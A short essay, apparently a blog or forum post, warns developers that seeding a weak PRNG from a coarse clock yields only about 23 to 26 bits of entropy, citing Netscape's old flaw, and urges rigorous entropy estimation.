The Problem Of Randomness
Many if not most experienced developers can't think the concept of entropy radically to the end, despite the fact that it is quite simple, actually.
So what they do is to sample a clock with shoddy resolution (say 10 ms) once and then seed a s**ty PRNG such as rand(5) from that. And then they make rand(5) emit hundreds or thousands of supposedly random bits.
In reality, what they do is to sample a shoddy timer, which has only 86400*100=8,4 million == 23bits of entropy per day. So if you know a webserver has been started in a timeframe of +/- 5 days, the key space is 5*2*8,6E6== 26 bits of entropy.
Searching a keyspace of 26bits is well within the reach of the lamest PC which exists in a modern juvenile bedroom. Netscape had exactly this problem in their webservers and I know of a very similar issue from a "e-banking security firm", which thought rand(5) would be good for creating cookies.
So whenever you sample something, ask yourself *rigorously* how many bits of *real* entropy you actually acquire. Just because you can sample something 100 million times a second does not mean it does change at that rate, for example. Just because you sample at 16 bit accuracy does not mean that measurement interval will be evenly used.